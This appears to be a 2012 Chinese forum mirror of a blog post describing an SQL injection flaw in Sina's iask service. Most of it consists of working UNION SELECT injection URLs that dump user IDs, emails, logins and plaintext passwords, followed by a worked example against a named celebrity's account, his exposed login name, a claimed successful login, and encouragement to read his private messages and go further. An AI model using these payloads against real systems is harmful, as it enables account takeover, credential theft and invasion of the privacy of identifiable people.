返回信息流此为转载,原文来自:
http://www.youxia.org/2012/01/2012-SINA-weibo-user-password-lose.html
新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。
漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9
漏洞利用方式:
http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--
这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。
直接举个例子比如我们通过新浪微波查找到刘谦,点击他的个人资料。我们可以再浏览器地址栏处看到刘谦的uid(新浪用户数字id),此处uid为12715428867
直接构造地址
http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--
直接获得刘谦的账号和密码
这里账号是luchenmagic密码为2lo*****(保密)
尝试登陆
成功登陆。刘谦微薄。这里你可以看看你的偶像的各种私信,聊天记录之类的。
接下来的事情你可以自由发挥了。但是对于一个黑客而言,这只不过是一个开始而已(这里我并无恶意,拿刘谦的账号来测试只是为了致敬,希望有机会能够见证奇迹!)。
这是一条镜像帖。来源:北邮人论坛 / security / #33491同步于 2012/1/5
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
这次泄露的是新浪,这次中枪的是刘谦
BookMoth
2012/1/5镜像同步2 回复
订阅后,新回复会通过你的通知中心匿名送达。